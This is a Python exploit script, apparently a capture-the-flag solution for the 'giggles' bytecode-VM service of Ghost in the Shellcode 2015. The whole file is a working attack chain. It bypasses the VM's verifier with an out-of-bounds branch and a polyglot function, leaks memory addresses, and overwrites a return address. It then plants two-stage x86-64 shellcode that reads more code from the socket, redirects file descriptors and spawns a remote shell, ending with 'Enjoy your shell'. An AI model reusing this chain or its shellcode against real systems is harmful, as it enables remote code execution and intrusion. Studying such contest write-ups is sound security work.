#!/usr/bin/python
#
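# Requires tools.py (https://github.com/niklasb/ctf-tools/blob/master/tools.py),
# pulled in below via `from tools import *`; x86_64, x86_64_shellcode and
# socket_interact are expected to come from it.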

import socket
import struct
import sys
from tools import *

# Request types: sent as the first byte of every request packet.
TYPE_ADDFUNC, TYPE_VERIFY, TYPE_RUNFUNC = range(3)

# VM opcodes: encoded as the leading 16-bit field of each operation.
(OP_ADD,    # 0
 OP_BR,     # 1
 OP_BEQ,    # 2
 OP_BGT,    # 3
 OP_MOV,    # 4
 OP_OUT,    # 5
 OP_EXIT,   # 6
 ) = range(7)

def createOperation(op, opnd1, opnd2, opnd3):
    """Serialize one VM operation.

    Layout (native byte order): a 16-bit opcode followed by three 64-bit
    operands -- 26 bytes, with no padding between the opcode and operands.
    """
    opcode_bytes = struct.pack("H", op)
    # Three consecutive "Q" fields start 8-byte aligned at offset 0 of their
    # own pack call, so no padding is inserted between them.
    operand_bytes = struct.pack("QQQ", opnd1, opnd2, opnd3)
    return opcode_bytes + operand_bytes

def createFunction(num_ops, num_args, bytecode):
    """Serialize a function: a 5-byte header followed by its bytecode.

    Header (native byte order): operation count (16-bit), argument count
    (16-bit) and a "verified" flag byte that is always sent as 0.
    """
    # "HHB" packs to exactly 5 bytes: the trailing single byte needs no
    # alignment, so this matches packing the three fields one by one.
    header = struct.pack("HHB", num_ops, num_args, 0)
    return header + bytecode

def _recv_exact(sockfd, size):
    """Return exactly `size` bytes read from `sockfd`.

    A single recv(n) may legally return fewer than n bytes, so keep reading
    until the full amount has arrived.

    Raises:
        EOFError: the peer closed the connection before `size` bytes arrived.
    """
    chunks = []
    remaining = size
    while remaining > 0:
        chunk = sockfd.recv(remaining)
        if not chunk:
            raise EOFError("connection closed with %d of %d bytes outstanding"
                           % (remaining, size))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def _send_request(sockfd, msg_type, payload):
    """Send one request: type byte, 16-bit payload length, then the payload."""
    # Packed separately on purpose: a combined native "BH" format would
    # insert an alignment byte between the type and the length.
    packet = struct.pack("B", msg_type) + struct.pack("H", len(payload)) + payload
    # sendall, unlike send, does not silently drop a partially-sent tail.
    sockfd.sendall(packet)


def _check_status(sockfd, request_name):
    """Consume a status reply and raise if the server reported failure."""
    # 2-byte reply header, discarded (presumably the reply length -- confirm).
    _recv_exact(sockfd, 2)
    status = struct.unpack("I", _recv_exact(sockfd, 4))[0]
    if status != 0:
        raise Exception("%s request failed with status %d" % (request_name, status))


def addFunction(sockfd, function):
    """Upload a serialized function (as built by createFunction).

    Raises:
        Exception: the server answered with a non-zero status.
        EOFError: the connection closed before the full reply arrived.
    """
    _send_request(sockfd, TYPE_ADDFUNC, function)
    _check_status(sockfd, "ADDFUNC")


def verifyFunction(sockfd, idx):
    """Ask the server to verify the function at index `idx`.

    Raises:
        Exception: the server answered with a non-zero status.
        EOFError: the connection closed before the full reply arrived.
    """
    _send_request(sockfd, TYPE_VERIFY, struct.pack("H", idx))
    _check_status(sockfd, "VERIFY")


def runFunction(sockfd, idx, args, wait=1):
    """Run the function at index `idx` with 32-bit integer `args`.

    Payload: index (16-bit), argument count (16-bit), then one 32-bit value
    per argument.

    Returns:
        None when `wait` is falsy (the reply is left unread); otherwise the
        output bytes announced by a 16-bit length prefix, or "" when that
        length is 0.

    Raises:
        EOFError: the connection closed before the full reply arrived.
    """
    payload = struct.pack("H", idx) + struct.pack("H", len(args))
    payload += b"".join(struct.pack("I", arg) for arg in args)
    _send_request(sockfd, TYPE_RUNFUNC, payload)

    if not wait:
        return None
    outlen = struct.unpack("H", _recv_exact(sockfd, 2))[0]
    if outlen == 0:
        return ""
    return _recv_exact(sockfd, outlen)

def preamble(host='giggles.2015.ghostintheshellcode.com', port=1423):
    """Open a connection and install the functions the exploit builds on.

    Installs, in order:
      * first function (index 0): 30 copies of `OP_BR 30`, i.e. a branch to
        operation index 30, one past its last operation; it is then verified;
      * second function: a "polyglot" whose header bytes, reinterpreted as an
        operation, encode `OP_BR jmp_target` (checked by the asserts below);
      * ins_size - 2 one-op padding functions.

    Args:
        host: target hostname; pass 'localhost' for a local test instance.
        port: target TCP port.

    Returns:
        The connected socket. If setup fails, the socket is closed and the
        original exception is re-raised.
    """
    sockfd = socket.create_connection((host, port))
    try:
        ins_size = 2 + 3*8                      # createOperation: H + 3*Q
        func_size = 2 + 2 + 1 + 30*ins_size     # createFunction header + 30 ops
        jmp_target = func_size

        # add the initial, verified function with out of bounds jump
        operations = ""
        for _ in xrange(30):
            operations += createOperation(OP_BR, 30, 0, 0)
        trampoline_func = createFunction(30, 0, operations)
        addFunction(sockfd, trampoline_func)
        verifyFunction(sockfd, 0)

        # add polyglot function: "<HQ" (1, jmp_target) has the same layout as
        # an operation `OP_BR jmp_target`; the asserts confirm that the same
        # bytes, read as a function header, give num_ops == OP_BR and an
        # unverified flag.
        s = struct.pack("<HQ", 1, jmp_target) + "A"*5
        num_ops, num_args, verified, opcode, op1 = struct.unpack("<HHBHQ", s)
        assert num_ops == OP_BR
        assert verified == 0

        polyglot_func = createFunction(num_ops, num_args, createOperation(opcode, op1, 0, 0))
        addFunction(sockfd, polyglot_func)

        # padding
        for _ in xrange(ins_size - 2):
            addFunction(sockfd, createFunction(1,0,createOperation(0,0,0,0)))
    except Exception:
        # Don't leak the connection when setup fails part-way.
        sockfd.close()
        raise

    return sockfd

def read_relative(w):
    """Leak a 64-bit value held in 32-bit register slots w (low) and w+1 (high).

    Opens a fresh connection via preamble(), adds a two-op function that
    outputs (OP_OUT) slot w+1 and then slot w, runs function 0, and parses
    the output as two whitespace-separated hex dwords. The connection is
    always closed afterwards.
    """
    sockfd = preamble()
    try:
        operations = createOperation(OP_OUT, w+1, 0, 0)
        operations += createOperation(OP_OUT, w, 0, 0)
        addFunction(sockfd, createFunction(2, 0, operations))
        s = runFunction(sockfd, 0, [])
    finally:
        sockfd.close()

    tokens = s.split()
    if len(tokens) == 2:
        # Combine numerically: string concatenation would misplace the bits
        # if the low dword were printed without zero-padding. When it is
        # padded to 8 digits, both forms give the same value.
        high, low = int(tokens[0], 16), int(tokens[1], 16)
        return (high << 32) | low
    # Unexpected token count: fall back to the original concatenation.
    return int("".join(tokens), 16)

# Leak two 64-bit values via read_relative (one fresh connection each).
# The value in slots 24/25 is taken to be register_base + 192, and the value
# in slots 26/27 to be exe_base + 0x1efd.
# NOTE(review): both offsets are specific to the target binary; slots 26/27
# presumably hold a saved return address into the executable -- confirm.
register_base = read_relative(24) - 192
print "[*] register base =", hex(register_base)
exe_base = read_relative(26) - 0x1efd
print "[*] exe base =", hex(exe_base)

def calc_abs(addr):
    """Convert an absolute address into a register-slot index.

    Slots are 4 bytes wide and counted from the module-level `register_base`.
    The result is reduced modulo 2**64, so addresses below the base wrap to a
    large unsigned 64-bit operand.

    Raises:
        ValueError: `addr` is not 4-byte aligned relative to `register_base`.
    """
    offset = addr - register_base
    if offset % 4 != 0:
        # Explicit check instead of assert, which is stripped under -O.
        raise ValueError("address %#x is not 4-byte aligned relative to "
                         "register base %#x" % (addr, register_base))
    # Floor division keeps the result an exact int on Python 3 too; `/` would
    # produce a float there (rejected by struct "Q", and imprecise > 2**53).
    return (offset // 4) % (2**64)

# Offset, inside the executable image, of the JIT buffer pointer; the pointer
# value stored there is leaked with the relative-read primitive.
# NOTE(review): 0x20f5c0 is specific to the target binary build -- confirm.
jit_ptr = 0x20f5c0
buf = read_relative(calc_abs(exe_base + jit_ptr))
print "[*] jit buffer =", hex(buf)

# Stage 1: a stub that issues syscall 0 (read on Linux x86-64) with rdi=4,
# rsi=buf+28 and rdx=0xff. It reads stage 2 from the socket to just after
# itself. It is NOP-padded (0x90) to exactly 28 bytes so that it splits into
# the seven 32-bit args passed to the VM below.
# NOTE(review): the padding can only grow the stub; if the assembled code ever
# exceeds 28 bytes, struct.unpack("IIIIIII", stage1) further down raises.
stage1 = x86_64.assemble("""
    push 4   ; this is the socket fd
    pop rdi
    mov rsi, {buf}
    push 0xff
    pop rdx
    mov rax, 0
    syscall
    """.format(buf=buf+28))
stage1 += "\x90"*(28 - len(stage1))

# Stage 2 must fit into the 0xff-byte read performed by stage 1.
stage2 = (
    # this code just calls dup2(rdi,0); dup2(rdi,1); dup2(rdi,2)
    x86_64_shellcode.dup2_rdi +
    # and then spawns a shell
    x86_64_shellcode.shell
)
assert len(stage2) <= 0xff

sockfd = preamble()
# Payload function. args[0]/args[1] are the low/high dwords of buf, and
# args[2:9] are the seven stage1 dwords (see `args` below).
# NOTE(review): assumes OP_MOV's operands are (destination slot, argument
# index) -- confirm against the VM.
operations = [
    # overwrite ret addr
    createOperation(OP_MOV, 26, 0, 0),
    createOperation(OP_MOV, 27, 1, 0)
]
# write shellcode
# Copies the stage1 dwords to buf, buf+4, ..., buf+24, addressed as
# register-slot indices via calc_abs.
for i in xrange(7):
    operations.append(createOperation(OP_MOV, calc_abs(buf+4*i), 2+i, 0))
operations += [
    createOperation(OP_EXIT, 0, 0, 0),
]

addFunction(sockfd, createFunction(len(operations), 0, "".join(operations)))
args = [buf&0xffffffff, buf>>32] + list(struct.unpack("IIIIIII", stage1))
# wait=0: don't read a reply; the connection is handed over to the shellcode.
runFunction(sockfd, 0, args, wait=0)

# Consumed by stage 1's read() into buf+28.
sockfd.sendall(stage2)
print "[*] Enjoy your shell :)"
socket_interact(sockfd)
